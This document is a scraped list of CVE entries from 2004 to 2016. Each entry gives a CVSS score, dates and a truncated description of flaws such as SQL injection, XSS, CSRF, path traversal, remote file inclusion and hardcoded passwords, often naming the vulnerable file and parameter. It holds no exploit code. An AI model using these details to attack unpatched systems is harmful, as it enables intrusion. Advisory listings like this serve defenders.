Multiple SQL injection vulnerabilities in admin/class-bulk-editor-list-table.php in the WordPress SEO by Yoast plugin before 1.5.7, 1.6.x before 1.6.4, and 1.7.x before 1.7.4 for WordPress allow remote authenticated users to execute arbitrary SQL com
02-12-2016 - 22:04 17-03-2015 - 11:59
CVE-2015-2275 4.3
Cross-site scripting (XSS) vulnerability in WoltLab Community Gallery 2.0 before 2014-12-26 allows remote attackers to inject arbitrary web script or HTML via the parameters[data][7][title] parameter in a saveImageData action to index.php/AJAXProxy.
02-12-2016 - 22:04 12-03-2015 - 13:59
CVE-2015-2248 6.8
Cross-site request forgery (CSRF) vulnerability in the user portal in Dell SonicWALL Secure Remote Access (SRA) products with firmware before 7.5.1.0-38sv and 8.x before 8.0.0.1-16sv allows remote attackers to hijack the authentication of users for r
02-12-2016 - 22:04 01-05-2015 - 11:59
CVE-2015-2237 7.5
Multiple SQL injection vulnerabilities in Betster (aka PHP Betoffice) 1.0.4 allow remote attackers to execute arbitrary SQL commands via the id parameter to (1) showprofile.php or (2) categoryedit.php or (3) username parameter in a login to index.php
02-12-2016 - 22:04 12-03-2015 - 13:59
CVE-2015-2218 4.3
Multiple cross-site scripting (XSS) vulnerabilities in the wp_ajax_save_item function in wonderpluginaudio.php in the WonderPlugin Audio Player plugin before 2.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1)
02-12-2016 - 22:04 05-03-2015 - 11:59
CVE-2015-2216 7.5
SQL injection vulnerability in ecomm-sizes.php in the Photocrati theme 4.x for WordPress allows remote attackers to execute arbitrary SQL commands via the prod_id parameter.
02-12-2016 - 22:04 05-03-2015 - 10:59
CVE-2015-2169 4.3
Cross-site scripting (XSS) vulnerability in Zoho ManageEngine AssetExplorer 6.1 service pack 6112 allows remote attackers to inject arbitrary web script or HTML via a Publisher registry entry, which is not properly handled when the machine is scanned
02-12-2016 - 22:04 24-06-2015 - 10:59
CVE-2015-2166 5.0
Directory traversal vulnerability in the Instance Monitor in Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI.
02-12-2016 - 22:04 06-04-2015 - 11:59
CVE-2010-4279 10.0
The default configuration of Pandora FMS 3.1 and earlier specifies an empty string for the loginhash_pwd field, which allows remote attackers to bypass authentication by sending a request to index.php with "admin" in the loginhash_user parameter, in
02-12-2016 - 21:59 02-12-2010 - 12:15
CVE-2016-2389 7.8
Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter t
30-11-2016 - 22:09 16-02-2016 - 10:59
CVE-2016-2388 5.0
The Universal Worklist Configuration in SAP NetWeaver 7.4 allows remote attackers to obtain sensitive user information via a crafted HTTP request, aka SAP Security Note 2256846.
30-11-2016 - 22:09 16-02-2016 - 10:59
CVE-2016-2386 7.5
SQL injection vulnerability in the UDDI server in SAP NetWeaver J2EE Engine 7.40 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, aka SAP Security Note 2101079.
30-11-2016 - 22:08 16-02-2016 - 10:59
CVE-2016-3976 5.0
Directory traversal vulnerability in SAP NetWeaver AS Java 7.1 through 7.5 allows remote attackers to read arbitrary files via a ..\ (dot dot backslash) in the fileName parameter to CrashFileDownloadServlet, aka SAP Security Note 2234971.
29-11-2016 - 22:05 07-04-2016 - 19:59
CVE-2016-3974 7.5
XML external entity (XXE) vulnerability in the Configuration Wizard in SAP NetWeaver Java AS 7.1 through 7.5 allows remote attackers to cause a denial of service, conduct SMB Relay attacks, or access arbitrary files via a crafted XML request to _tc~m
29-11-2016 - 22:05 07-04-2016 - 15:59
CVE-2016-2296 7.5
Meteocontrol WEB'log Basic 100, Light, Pro, and Pro Unlimited does not require authentication for "post-admin" login pages, which allows remote attackers to obtain sensitive information or modify data via unspecified vectors.
29-11-2016 - 22:04 14-05-2016 - 12:59
CVE-2015-2102 7.5
SQL injection vulnerability in view_item.php in ClipBucket 2.7 RC3 (2.7.0.4.v2929-rc3) allows remote attackers to execute arbitrary SQL commands via the item parameter.
29-11-2016 - 22:01 27-02-2015 - 10:59
CVE-2015-2090 7.5
SQL injection vulnerability in the ajax_survey function in settings.php in the WordPress Survey and Poll plugin 1.1.7 for WordPress allows remote attackers to execute arbitrary SQL commands via the survey_id parameter in an ajax_survey action to wp-a
29-11-2016 - 22:01 26-02-2015 - 10:59
CVE-2015-2084 6.8
Cross-site request forgery (CSRF) vulnerability in the Easy Social Icons plugin before 1.2.3 for WordPress allows remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting (XSS) attacks via the ima
29-11-2016 - 22:00 25-02-2015 - 17:59
CVE-2015-2071 4.0
Directory traversal vulnerability in cm/newui/blog/export.jsp in eTouch SamePage Enterprise Edition 4.4.0.0.239 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the filepath parameter.
29-11-2016 - 22:00 24-02-2015 - 12:59
CVE-2015-2070 7.5
SQL injection vulnerability in eTouch SamePage Enterprise Edition 4.4.0.0.239 allows remote attackers to execute arbitrary SQL commands via the catId parameter to cm/blogrss/feed.
29-11-2016 - 22:00 24-02-2015 - 12:59
CVE-2015-2068 4.3
Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to
29-11-2016 - 22:00 24-02-2015 - 12:59
CVE-2015-2067 5.0
Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
29-11-2016 - 22:00 24-02-2015 - 12:59
CVE-2015-2065 7.5
SQL injection vulnerability in videogalleryrss.php in the Apptha WordPress Video Gallery (contus-video-gallery) plugin before 2.8 for WordPress allows remote attackers to execute arbitrary SQL commands via the vid parameter in a rss action to wp-admi
29-11-2016 - 22:00 24-02-2015 - 12:59
CVE-2016-8582 7.5
A vulnerability exists in gauge.php of AlienVault OSSIM and USM before 5.3.2 that allows an attacker to execute an arbitrary SQL query and retrieve database information or read local system files via MySQL's LOAD_FILE.
28-11-2016 - 15:40 28-10-2016 - 11:59
CVE-2016-8581 4.3
A persistent XSS vulnerability exists in the User-Agent header of the login process of AlienVault OSSIM and USM before 5.3.2 that allows an attacker to steal session IDs of logged in users when the current sessions are viewed by an administrator.
28-11-2016 - 15:40 28-10-2016 - 11:59
CVE-2016-8580 7.5
PHP object injection vulnerabilities exist in multiple widget files in AlienVault OSSIM and USM before 5.3.2. These vulnerabilities allow arbitrary PHP code execution via magic methods in included classes.
28-11-2016 - 15:40 28-10-2016 - 11:59
CVE-2016-7851 4.3
Adobe Connect version 9.5.6 and earlier does not adequately validate input in the events registration module. This vulnerability could be exploited in cross-site scripting attacks.
28-11-2016 - 15:39 08-11-2016 - 12:59
CVE-2016-6483 5.0
The media-file upload feature in vBulletin before 3.8.7 Patch Level 6, 3.8.8 before Patch Level 2, 3.8.9 before Patch Level 1, 4.x before 4.2.2 Patch Level 6, 4.2.3 before Patch Level 2, 5.x before 5.2.0 Patch Level 3, 5.2.1 before Patch Level 1, and
28-11-2016 - 15:33 01-09-2016 - 21:59
CVE-2016-6186 4.3
Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function in contrib/admin/static/admin/js/admin/RelatedObjectLookups.js in Django before 1.8.14, 1.9.x before 1.9.8, and 1.10.x before 1.10rc1 allows remote attackers to
28-11-2016 - 15:30 05-08-2016 - 11:59
CVE-2016-5840 9.0
hotfix_upload.cgi in Trend Micro Deep Discovery Inspector (DDI) 3.7, 3.8 SP1 (3.81), and 3.8 SP2 (3.82) allows remote administrators to execute arbitrary code via shell metacharacters in the filename parameter of the Content-Disposition header.
28-11-2016 - 15:29 30-06-2016 - 12:59
CVE-2016-5734 7.5
phpMyAdmin 4.0.x before 4.0.10.16, 4.4.x before 4.4.15.7, and 4.6.x before 4.6.3 does not properly choose delimiters to prevent use of the preg_replace e (aka eval) modifier, which might allow remote attackers to execute arbitrary PHP code via a craf
28-11-2016 - 15:29 02-07-2016 - 21:59
CVE-2016-4469 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.3.9 and earlier allow remote attackers to hijack the authentication of administrators for requests that (1) add new repository proxy connectors via the token parameter to
28-11-2016 - 15:18 28-07-2016 - 12:59
CVE-2016-4309 7.6
Session fixation vulnerability in Symphony CMS 2.6.7, when session.use_only_cookies is disabled, allows remote attackers to hijack web sessions via the PHPSESSID parameter.
28-11-2016 - 15:17 30-06-2016 - 13:59
CVE-2016-4264 6.4
The Office Open XML (OOXML) feature in Adobe ColdFusion 10 before Update 21 and 11 before Update 10 allows remote attackers to read arbitrary files or send TCP requests to intranet servers via a crafted OOXML spreadsheet containing an external entity
28-11-2016 - 15:17 01-09-2016 - 19:59
CVE-2016-3473 4.0
Unspecified vulnerability in the BI Publisher (formerly XML Publisher) component in Oracle Fusion Middleware 11.1.1.7.0, 11.1.1.9.0, and 12.2.1.0.0 allows remote authenticated users to affect confidentiality via unknown vectors.
28-11-2016 - 15:09 25-10-2016 - 10:29
CVE-2016-1611 7.2
Novell Filr 1.2 before Hot Patch 6 and 2.0 before Hot Patch 2 uses world-writable permissions for /etc/profile.d/vainit.sh, which allows local users to gain privileges by replacing this file's content with arbitrary shell commands.
28-11-2016 - 15:00 31-07-2016 - 22:59
CVE-2016-1610 5.0
Directory traversal vulnerability in the email-template feature in Novell Filr before 1.2 Security Update 3 and 2.0 before Security Update 2 allows remote attackers to bypass intended access restrictions and write to arbitrary files via a .. (dot dot
28-11-2016 - 15:00 31-07-2016 - 22:59
CVE-2016-1609 3.5
Multiple cross-site scripting (XSS) vulnerabilities in Novell Filr before 1.2 Security Update 3 and 2.0 before Security Update 2 allow remote authenticated users to inject arbitrary web script or HTML via crafted input, as demonstrated by a crafted a
28-11-2016 - 15:00 31-07-2016 - 22:59
CVE-2016-1608 9.0
vaconfig/time in Novell Filr before 1.2 Security Update 3 and 2.0 before Security Update 2 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the ntpServer parameter.
28-11-2016 - 15:00 31-07-2016 - 22:59
CVE-2016-1607 6.5
Multiple cross-site request forgery (CSRF) vulnerabilities in the administrative interface in Novell Filr before 2.0 Security Update 2 allow remote attackers to hijack the authentication of administrators, as demonstrated by reconfiguring time settin
28-11-2016 - 15:00 31-07-2016 - 22:59
CVE-2016-1337 4.3
Cisco EPC3928 devices allow remote attackers to obtain sensitive configuration and credential information by making requests during the early part of the boot process, related to a "Boot Information Disclosure" issue, aka Bug ID CSCux17178.
28-11-2016 - 14:58 03-07-2016 - 17:59
CVE-2016-1336 7.8
goform/Docsis_system on Cisco EPC3928 devices allows remote attackers to cause a denial of service (device crash) via a long LanguageSelect parameter, related to a "Gateway HTTP Corruption Denial of Service" issue, aka Bug ID CSCuy28100.
28-11-2016 - 14:58 03-07-2016 - 17:59
CVE-2016-1328 7.8
goform/WClientMACList on Cisco EPC3928 devices allows remote attackers to cause a denial of service (device crash) via a long h_sortWireless parameter, related to a "Gateway Client List Denial of Service" issue, aka Bug ID CSCux24948.
28-11-2016 - 14:58 03-07-2016 - 17:59
CVE-2015-8703 4.0
ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE and ZXV10 W300 devices W300V1.0.0f_ER1_PE allow remote authenticated users to bypass intended access restrictions, and discover credentials and keys, by reading the configuration file, a dif
28-11-2016 - 14:48 30-12-2015 - 00:59
CVE-2015-7252 4.3
Cross-site scripting (XSS) vulnerability in cgi-bin/webproc on ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allows remote attackers to inject arbitrary web script or HTML via the errorpage parameter.
28-11-2016 - 14:42 30-12-2015 - 00:59
CVE-2015-7251 10.0
ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE have a hardcoded password of root for the root account, which allows remote attackers to obtain administrative access via a TELNET session.
28-11-2016 - 14:42 30-12-2015 - 00:59
CVE-2015-7250 7.8
Absolute path traversal vulnerability in cgi-bin/webproc on ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
28-11-2016 - 14:42 30-12-2015 - 00:59
CVE-2015-7249 6.8
ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allow remote authenticated users to bypass intended access restrictions via a modified request, as demonstrated by leveraging the support account to change a password via a cgi-bin/webproc a
28-11-2016 - 14:42 30-12-2015 - 00:59
CVE-2015-7248 5.0
ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allow remote attackers to discover usernames and password hashes by reading the cgi-bin/webproc HTML source code, a different vulnerability than CVE-2015-8703.
28-11-2016 - 14:42 30-12-2015 - 00:59
CVE-2015-5066 4.3
Multiple cross-site scripting (XSS) vulnerabilities in the MetalGenix GeniXCMS 0.0.3 allow remote attackers to inject arbitrary web script or HTML via the (1) content or (2) title field in an add action in the posts page to index.php or the (3) q par
28-11-2016 - 14:31 24-06-2015 - 10:59
CVE-2015-4533 9.0
EMC Documentum Content Server before 6.7SP1 P32, 6.7SP2 before P25, 7.0 before P19, 7.1 before P16, and 7.2 before P02 does not properly check authorization after creation of an object, which allows remote authenticated users to execute arbitrary cod
28-11-2016 - 14:29 20-08-2015 - 06:59
CVE-2015-3986 4.3
Cross-site request forgery (CSRF) vulnerability in the TheCartPress eCommerce Shopping Cart (aka The Professional WordPress eCommerce Plugin) plugin for WordPress before 1.3.9.3 allows remote attackers to hijack the authentication of administrators f
28-11-2016 - 14:27 14-05-2015 - 10:59
CVE-2015-3301 4.0
Directory traversal vulnerability in the TheCartPress eCommerce Shopping Cart (aka The Professional WordPress eCommerce Plugin) plugin for WordPress before 1.3.9.3 allows remote administrators to read arbitrary files via a .. (dot dot) in the tcp_box
28-11-2016 - 14:23 14-05-2015 - 10:59
CVE-2015-3300 4.3
Multiple cross-site scripting (XSS) vulnerabilities in the TheCartPress eCommerce Shopping Cart (aka The Professional WordPress eCommerce Plugin) plugin for WordPress before 1.3.9.3 allow remote attackers to inject arbitrary web script or HTML via th
28-11-2016 - 14:23 14-05-2015 - 10:59
CVE-2015-1366 4.3
Cross-site scripting (XSS) vulnerability in pixabay-images.php in the Pixabay Images plugin before 2.4 for WordPress allows remote attackers to inject arbitrary web script or HTML via the image_user parameter.
28-11-2016 - 14:18 27-01-2015 - 15:04
CVE-2006-5055 7.5
PHP remote file inclusion vulnerability in admin/testing/tests/0004_init_urls.php in syntaxCMS 1.1.1 through 1.3 allows remote attackers to execute arbitrary PHP code via a URL in the init_path parameter.
28-11-2016 - 14:06 27-09-2006 - 20:07
CVE-2006-4885 7.5
PHP remote file inclusion vulnerability in Shadowed Portal 5.599 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the root parameter in (1) footer.php and (2) header.php. NOTE: the provenance of this information is unkn
28-11-2016 - 14:06 19-09-2006 - 17:07
CVE-2006-4714 5.1
PHP remote file inclusion vulnerability in index.php in SpoonLabs Vivvo Article Management CMS (aka phpWordPress) 3.2 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the classified_pat
28-11-2016 - 14:06 12-09-2006 - 12:07
CVE-2006-0206 7.5
Eval injection vulnerability in Light Weight Calendar (LWC) 1.0 (20040909) and earlier allows remote attackers to execute arbitrary PHP code via the date parameter in cal.php, which is included by index.php.
28-11-2016 - 14:06 13-01-2006 - 18:03
CVE-2007-0683 7.5
PHP remote file inclusion vulnerability in includes/functions.php in Omegaboard 1.0beta4 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.
21-11-2016 - 09:17 02-02-2007 - 20:28
CVE-2006-1252 7.5
Eval injection vulnerability in cal.php in Light Weight Calendar (LWC) 1.0 allows remote attackers to execute arbitrary PHP code via the date parameter to index.php.
18-11-2016 - 22:00 18-03-2006 - 20:02
CVE-2016-8869 7.5
The register method in the UsersModelRegistration class in controllers/user.php in the Users component in Joomla! before 3.6.4 allows remote attackers to gain privileges by leveraging incorrect use of unfiltered data when registering on a site.
07-11-2016 - 14:15 04-11-2016 - 17:59
CVE-2016-8870 6.8
The register method in the UsersModelRegistration class in controllers/user.php in the Users component in Joomla! before 3.6.4, when registration has been disabled, allows remote attackers to create user accounts by leveraging failure to check the Al
07-11-2016 - 14:15 04-11-2016 - 17:59
CVE-2013-7043 8.3
Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via
01-11-2016 - 14:22 10-12-2013 - 14:55
CVE-2006-6552 7.5
PHP remote file inclusion vulnerability in admin/plugins/NP_UserSharing.php in BLOG:CMS 4.1.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the DIR_ADMIN parameter.
17-10-2016 - 23:42 14-12-2006 - 13:28
CVE-2006-5893 7.5
Multiple PHP remote file inclusion vulnerabilities in iWonder Designs Storystream 0.4.0.0 allow remote attackers to execute arbitrary PHP code via a URL in the baseDir parameter to (1) mysql.php and (2) mysqli.php in include/classes/pear/DB/.
17-10-2016 - 23:41 14-11-2006 - 17:07
CVE-2006-5768 7.5
Multiple PHP remote file inclusion vulnerabilities in Cyberfolio 2.0 RC1 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the av parameter to (1) msg/view.php, (2) msg/inc_message.php, (
17-10-2016 - 23:41 06-11-2006 - 18:07
CVE-2006-5471 7.5
PHP remote file inclusion vulnerability in example/lib/grid3.lib.php in Softerra PHP Developer Library 1.5.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the (1) cfg_dir and (2) lib_dir parameters.
17-10-2016 - 23:41 24-10-2006 - 16:07
CVE-2006-5301 6.8
PHP remote file inclusion vulnerability in includes/antispam.php in the SpamBlockerMODv 1.0.2 and earlier module for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.
17-10-2016 - 23:41 17-10-2006 - 11:07
CVE-2006-5259 7.5
PHP remote file inclusion vulnerability in param_editor.php in Compteur 2 allows remote attackers to execute arbitrary PHP code via a URL in the folder parameter.
17-10-2016 - 23:41 12-10-2006 - 18:07
CVE-2006-4922 5.0
Unrestricted file upload vulnerability in starnet/editors/htmlarea/popups/images.php in Site@School (S@S) 2.4.02 and earlier allows remote attackers to upload and execute arbitrary files with executable extensions.
17-10-2016 - 23:41 20-09-2006 - 21:07
CVE-2006-4921 7.5
PHP remote file inclusion vulnerability in Site@School (S@S) 2.4.03 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the cmsdir parameter to starnet/modules/include/include.php. NOTE: some of these details are obtained f
17-10-2016 - 23:41 20-09-2006 - 21:07
CVE-2006-4920 7.5
Multiple PHP remote file inclusion vulnerabilities in Site@School (S@S) 2.4.02 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the cmsdir parameter to (1) starnet/modules/sn_allbum/slideshow.php, and (2) starnet/themes/e
17-10-2016 - 23:41 20-09-2006 - 21:07
CVE-2006-4369 2.6
Absolute path traversal vulnerability in includes/functions_portal.php in IntegraMOD Portal 2.x and earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via an absolute pathname in the phpbb_root_path parameter.
17-10-2016 - 23:40 26-08-2006 - 17:04
CVE-2006-4368 7.5
PHP remote file inclusion vulnerability in includes/functions_portal.php in IntegraMOD Portal 2.x and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.
17-10-2016 - 23:40 26-08-2006 - 17:04
CVE-2006-4365 7.5
Multiple PHP remote file inclusion vulnerabilities in VistaBB 2.0.33 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter in (1) includes/functions_mod_user.php or (2) includes/functions_portal.p
17-10-2016 - 23:40 26-08-2006 - 17:04
CVE-2006-3528 6.8
Multiple PHP remote file inclusion vulnerabilities in Simpleboard Mambo module 1.1.0 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the sbp parameter to (1) image_upload.php and (2) file_upload.php.
17-10-2016 - 23:40 11-07-2006 - 20:05
CVE-2006-0961 7.5
SQL injection vulnerability in yazdir.asp in Cilem Hiber 1.1 allows remote attackers to execute arbitrary SQL commands via the haber_id parameter. NOTE: this product has also been referred to as "Cilem News," although that does not appear to be the
17-10-2016 - 23:39 02-03-2006 - 18:02
CVE-2005-3363 7.5
SQL injection vulnerability in Saphp Lesson, possibly saphp Lesson1.1 and saphpLesson2.0, allows remote attackers to execute arbitrary SQL commands via the forumid parameter in (1) showcat.php and (2) add.php.
17-10-2016 - 23:34 30-10-2005 - 09:34
CVE-2005-2428 5.0
Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password ha
17-10-2016 - 23:27 03-08-2005 - 00:00
CVE-2005-2412 5.0
PHP remote file inclusion vulnerability in block.php in PHP FirstPost allows remote attackers to execute arbitrary PHP code via the Include parameter.
17-10-2016 - 23:26 03-08-2005 - 00:00
CVE-2005-2062 7.5
Multiple SQL injection vulnerabilities in ActiveBuyAndSell 6.2 allow remote attackers to execute arbitrary SQL commands via the catid parameter to (1) default.asp or (2) buyersend.asp, (3) Administrator ID field in admin.asp, E-mail field in (4) adve
17-10-2016 - 23:24 29-06-2005 - 00:00
CVE-2005-1598 7.5
SQL injection vulnerability in Invision Power Board (IPB) 2.0.3 and earlier allows remote attackers to execute arbitrary SQL commands via a crafted cookie password hash (pass_hash) that modifies the internal $pid variable.
17-10-2016 - 23:21 16-05-2005 - 00:00
CVE-2005-0725 7.5
SQL injection vulnerability in the getAllbyArticle function in wfsfiles.php for WF-Sections (wfsections) 1.07 allows remote attackers to execute arbitrary SQL commands via the articleid parameter to article.php.
17-10-2016 - 23:14 08-03-2005 - 00:00
CVE-2004-1580 7.5
SQL injection vulnerability in index.php in CubeCart 2.0.1 allows remote attackers to execute arbitrary SQL commands via the cat_id parameter.
17-10-2016 - 22:56 31-12-2004 - 00:00
CVE-2004-1553 7.5
SQL injection vulnerability in aspWebAlbum allows remote attackers to execute arbitrary SQL statements via (1) the username field on the login page or (2) the cat parameter to album.asp. NOTE: it was later reported that vector 1 affects aspWebAlbum
17-10-2016 - 22:56 31-12-2004 - 00:00
CVE-2004-1552 7.5
SQL injection vulnerability in aspWebCalendar allows remote attackers to execute arbitrary SQL statements via (1) the username field on the login page or (2) the eventid parameter to calendar.asp.
17-10-2016 - 22:56 31-12-2004 - 00:00
CVE-2008-5308 7.5
The Simple Forum 3.1d module for LoveCMS 1.6.2 Final does not properly restrict access to administrator functions, which allows remote attackers to change the administrator password via a direct request to modules/simpleforum/admin/index.php.
11-10-2016 - 21:59 02-12-2008 - 07:00
CVE-2010-2685 7.5
siteadmin/adduser.php in Customer Paradigm PageDirector CMS does not properly restrict access, which allows remote attackers to bypass intended restrictions and add administrative users via a direct request.
06-10-2016 - 21:59 12-07-2010 - 09:27
CVE-2008-5619 10.0
html2text.php in Chuggnutt HTML to Text Converter, as used in PHPMailer before 5.2.10, RoundCube Webmail (roundcubemail) 0.2-1.alpha and 0.2-3.beta, Mahara, and AtMail Open 1.03, allows remote attackers to execute arbitrary code via crafted input tha
22-09-2016 - 21:59 16-12-2008 - 21:30
CVE-2013-3961 6.5
SQL injection vulnerability in edit_event.php in Simple PHP Agenda before 2.2.9 allows remote authenticated users to execute arbitrary SQL commands via the eventid parameter.
21-09-2016 - 10:25 11-03-2014 - 15:37
CVE-2009-5089 4.3
Directory traversal vulnerability in index.php in IdeaCart 0.02 and 0.02a allows remote attackers to read arbitrary files via a .. (dot dot) in the page parameter.
20-09-2016 - 00:00 12-09-2011 - 08:40
CVE-2011-5197 6.8
Cross-site request forgery (CSRF) vulnerability in index/manager/fileUpload in Public Knowledge Project Open Harvester Systems 2.3.1 and earlier allows remote attackers to hijack the authentication of administrators for requests that upload PHP files
19-09-2016 - 23:56 23-09-2012 - 13:55
CVE-2011-5196 6.8
Cross-site request forgery (CSRF) vulnerability in index/manager/fileUpload in Public Knowledge Project Open Journal Systems 2.3.6 and earlier allows remote attackers to hijack the authentication of administrators for requests that upload PHP files.
19-09-2016 - 23:56 23-09-2012 - 13:55
CVE-2011-5195 6.8
Cross-site request forgery (CSRF) vulnerability in index/manager/fileUpload in Public Knowledge Project Open Conference Systems 2.3.4 and earlier allows remote attackers to hijack the authentication of administrators for requests that upload a PHP fi
19-09-2016 - 23:55 23-09-2012 - 13:55
CVE-2013-6976 6.8
Cross-site request forgery (CSRF) vulnerability in goform/Quick_setup on Cisco EPC3925 devices allows remote attackers to hijack the authentication of administrators for requests that change a password via the Password and PasswordReEnter parameters,
15-09-2016 - 15:23 19-12-2013 - 17:55
CVE-2013-7136 9.3
The UPC Ireland Cisco EPC 2425 router (aka Horizon Box) does not have a sufficiently large number of possible WPA-PSK passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.
09-09-2016 - 10:35 19-12-2013 - 17:55
CVE-2014-4034 7.5
SQL injection vulnerability in zero_view_article.php in ZeroCMS 1.0 allows remote attackers to execute arbitrary SQL commands via the article_id parameter.
06-09-2016 - 10:18 11-06-2014 - 10:55
CVE-2014-10021 7.5
Unrestricted file upload vulnerability in UploadHandler.php in the WP Symposium plugin 14.11 for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to t
06-09-2016 - 09:10 13-01-2015 - 06:59
CVE-2012-4891 4.3
Cross-site scripting (XSS) vulnerability in fw/index2.do in ManageEngine Firewall Analyzer 7.2 allows remote attackers to inject arbitrary web script or HTML via the url parameter, a different vector than CVE-2012-4889. NOTE: the provenance of this
06-09-2016 - 09:05 10-09-2012 - 18:55
CVE-2007-2430 7.8
shared/code/tce_tmx.php in TCExam 4.0.011 and earlier allows remote attackers to create arbitrary PHP files in cache/ by placing file contents and directory traversal manipulations into a SessionUserLang cookie to public/code/index.php.
26-08-2016 - 21:59 01-05-2007 - 20:19
CVE-2007-2304 7.5
Multiple directory traversal vulnerabilities in Quick and Dirty Blog (QDBlog) 0.4, and possibly earlier, allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the theme parameter to categories.php and other unspeci
23-08-2016 - 21:59 26-04-2007 - 17:19
CVE-2009-1030 4.3
Cross-site scripting (XSS) vulnerability in the choose_primary_blog function in wp-includes/wpmu-functions.php in WordPress MU (WPMU) before 2.7 allows remote attackers to inject arbitrary web script or HTML via the HTTP Host header.
22-08-2016 - 21:59 19-03-2009 - 20:30
CVE-2014-5370 7.5
Directory traversal vulnerability in the CFChart servlet (com.naryx.tagfusion.cfm.cfchartServlet) in New Atlanta BlueDragon before 7.1.1.18527 allows remote attackers to read or possibly delete arbitrary files via a .. (dot dot) in the QUERY_STRING t
18-08-2016 - 10:59 21-04-2015 - 11:59
CVE-2015-1875 7.5
SQL injection vulnerability in a2billing/customer/iridium_threed.php in Elastix 2.5.0 and earlier allows remote attackers to execute arbitrary SQL commands via the transactionID parameter.
03-08-2016 - 23:17 11-03-2015 - 10:59
CVE-2016-5304 4.9
Open redirect vulnerability in a report-routing component in Symantec Endpoint Protection Manager (SEPM) 12.1 before RU6 MP5 allows remote authenticated users to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vecto
01-07-2016 - 19:13 30-06-2016 - 19:59
CVE-2016-3653 6.0
Multiple cross-site request forgery (CSRF) vulnerabilities in management scripts in Symantec Endpoint Protection Manager (SEPM) 12.1 before RU6 MP5 allow remote authenticated users to hijack the authentication of arbitrary users.
01-07-2016 - 19:11 30-06-2016 - 19:59
CVE-2016-3652 3.5
Multiple cross-site scripting (XSS) vulnerabilities in management scripts in Symantec Endpoint Protection Manager (SEPM) 12.1 before RU6 MP5 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
01-07-2016 - 19:11 30-06-2016 - 19:59
CVE-2016-3670 4.3
Cross-site scripting (XSS) vulnerability in users.jsp in the Profile Search functionality in Liferay before 7.0.0 CE RC1 allows remote attackers to inject arbitrary web script or HTML via the FirstName field.
20-06-2016 - 08:35 13-06-2016 - 10:59
CVE-2015-4420 4.3
Multiple cross-site scripting (XSS) vulnerabilities in Opsview 4.6.2 and earlier allow remote attackers to inject arbitrary web script or HTML via a (1) crafted check plugin, the (2) description in a host profile, or the (3) plugin_args parameter to
15-06-2016 - 09:22 18-06-2015 - 14:59
CVE-2014-8391 4.0
The Web interface in Sendio before 7.2.4 does not properly handle sessions, which allows remote authenticated users to obtain sensitive information from other users' sessions via a large number of requests.
27-05-2016 - 11:48 02-06-2015 - 10:59
CVE-2012-4901 4.3
Cross-site scripting (XSS) vulnerability in Template CMS 2.1.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the themes_editor parameter in an add_template action to admin/index.php.
27-05-2016 - 11:30 20-05-2015 - 15:59
CVE-2016-2784 2.6
CMS Made Simple 2.x before 2.1.3 and 1.x before 1.12.2, when Smarty Cache is activated, allow remote attackers to conduct cache poisoning attacks, modify links, and conduct cross-site scripting (XSS) attacks via a crafted HTTP Host header in a reques
26-05-2016 - 18:12 26-05-2016 - 10:59
CVE-2014-1683 6.8
The bashMail function in cms/data/skins/techjunkie/fragments/contacts/functions.php in SkyBlueCanvas CMS before 1.1 r248-04, when the pid parameter is 4, allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) name,
25-05-2016 - 11:16 29-01-2014 - 13:55
CVE-2014-1610 6.0
